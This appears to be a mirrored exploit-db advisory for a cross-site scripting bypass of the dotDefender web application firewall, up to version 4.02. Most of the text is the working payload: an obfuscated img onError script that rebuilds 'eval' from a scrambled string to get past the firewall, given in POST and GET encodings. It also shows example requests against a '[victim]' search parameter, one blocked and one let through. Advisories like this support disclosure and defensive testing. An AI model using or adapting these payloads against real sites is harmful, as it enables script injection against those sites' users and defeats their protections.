扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
dotDefender is prone to a XSS because it doesn't satinate the input vars correctly. Injecting obfusctated JavaScript code based on references vars assignment, the dotDefender WAF is vulnerable. Class: Input Validation Error Remote: Yes Credit: David K. (SH4V) Vulnerable: till 4.02 Exploit: <img src="https://www.exploit-db.com/exploits/14355/WTF" onError="{var {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/ .source )" /> //POST <img src="https://www.exploit-db.com/exploits/14355/WTF" onError="{var {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B h%2Bn)( /0wn3d/.source)" /> //GET EXAMPLES: Blocked: [victim]/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3:s,2:h,5: a,0:v,4:n,1:e} =%27earltv%27}[self][0][v%2Ba%2Be%2Bs]%28e%2Bs%2Bv%2Bh%2Bn%29%28/0wn3d/. source% 29%22%20/%3E Unblocked: [victim]/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source) %20/%3E More information here: http://n3t-datagrams.net/docs/?/=21 |
体验盒子
